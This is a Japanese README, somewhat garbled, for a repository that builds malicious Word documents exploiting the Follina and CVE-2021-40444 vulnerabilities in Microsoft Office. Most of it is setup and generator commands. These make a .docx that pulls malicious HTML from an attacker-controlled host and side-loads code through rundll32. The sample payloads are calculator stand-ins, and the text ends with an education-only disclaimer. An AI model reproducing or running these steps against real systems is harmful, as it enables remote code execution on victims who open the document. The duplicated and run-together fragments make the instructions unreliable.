
このリポジトリには、Microsoft OfficeのFollina CVEおよびCVE-2021-40444の脆弱性を悪用するためのスクリプトとリソースが含まれています。スクリプトは、標的システム上で任意のコードを実行できる悪意のあるドキュメントファイルを生成します。
このリポジトリには、Microsoft Office における Follina CVE および CVE-2021-40444 脆弱性を悪用するためのスクリプトとリソースが含まれています。これらのスクリプトは、ターゲットシステム上で任意のコードを実行できる悪意のある文書ファイルを生成します。
requirements.txt に記載)Flare VM のセットアップ:
labpasswordPython と仮想環境:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv パッケージをインストールします:
pip install virtualenv
venv という名前の仮想環境を作成します:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
エクスプロイトの生成:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132 を自分の IP アドレスに置き換えてください。生成された文書へのアクセス:
.docx ファイルは以下のディレクトリに配置されます:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx)が開かれます。document.xml.rels 内で悪意のある HTML を指すリレーションシップが含まれています。%TEMP%Low ディレクトリに保存されます。rundll32 が INF ファイルをサイドロードします。generator.pycab_parser.pyrequirements.txt から Python パッケージをインストールします。python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
このプロジェクトは教育目的のみです。責任を持って使用し、テストする許可がないシステムに対して脆弱性を悪用しないでください。この情報の誤用は刑事責任を問われる可能性があります。